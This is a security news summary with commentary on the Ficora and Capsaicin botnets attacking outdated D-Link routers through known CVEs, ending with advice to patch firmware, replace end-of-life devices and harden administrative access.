Two botnets, Ficora and Capsaicin, have recently intensified their attacks on outdated and end-of-life D-Link routers by exploiting multiple known vulnerabilities, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
These malware variants specifically target popular D-Link models such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L, gaining initial access through weaknesses in the routers' management interface and executing malicious commands. After compromising a device, attackers use the access for data theft and launch distributed denial-of-service (DDoS) attacks.
Ficora is a modern offshoot of the Mirai botnet, built to exploit D-Link devices with a focus on wide geographic targeting but notable surges in Japan and the United States. Once inside, Ficora deploys a shell script named 'multi' that can download its payload using methods like wget, curl, ftpget, and tftp. It also features a brute-force mechanism with hard-coded credentials, enabling it to infect other Linux devices across different hardware architectures. For attack capabilities, Ficora supports UDP flooding, TCP flooding, and DNS amplification to boost the impact of its DDoS operations.
Capsaicin, a Kaiten botnet variant believed to be developed by the Keksec group, was observed in a concentrated burst of attacks mostly targeting East Asian countries over two days in October. Infection is initiated through a downloader script ("bins.sh") that fetches platform-specific binaries labeled with the 'yakuza' prefix. Aside from launching DDoS attacks, Capsaicin scans for other botnet payloads operating on the same device and disables them. It also collects host information and transmits it back to a command-and-control server.
Source: https://www.bleepingcomputer.com/news/security/malware-botnets-exploit-outdated-d-link-routers-in-recent-attacks/
Commentary
Botnets are automated networks of compromised devices controlled by malicious actors to carry out tasks such as distributed denial-of-service attacks, data theft, and the spread of malware. Their operation typically relies on infecting internet-connected devices - often those with security flaws or outdated firmware - so attackers can remotely coordinate large-scale, disruptive campaigns.
D-Link devices, particularly Wi-Fi routers, are integral parts of many organizations' infrastructures, offering affordable and reliable connectivity options. As a major player in the global router market, D-Link holds a significant market share, with estimates in recent years showing their routers account for about 10 percent of worldwide unit shipments and revenue.
Their portfolio ranges from consumer-grade models to enterprise solutions, making them a trusted but sometimes vulnerable choice in the midst of growing digital transformation.
The prevalence of D-Link routers within organizations is because of both widespread adoption and the expansion of wireless networks to support remote work, cloud services, and increasing device counts. Unfortunately, this popularity has made D-Link units a frequent target for botnet operators.
Given evolving threats, organizations must prioritize firmware updates for all network hardware and replace end-of-life devices that no longer receive security patches. Strong, unique passwords for administrative access, disabling unnecessary remote management features, and considering other firmware alternatives are also important.
The final takeaway is that maintaining vigilance over router security and lifecycle is essential for mitigating the risk of botnet infection and safeguarding both organizational resources and sensitive data.
Additional Sources: https://www.kbvresearch.com/router-market/; https://www.cognitivemarketresearch.com/articles/which-are-the-top-manufacturing-companies-of-wi-fi-routers-market; https://www.globaldata.com/company-profile/d-link-corporation/
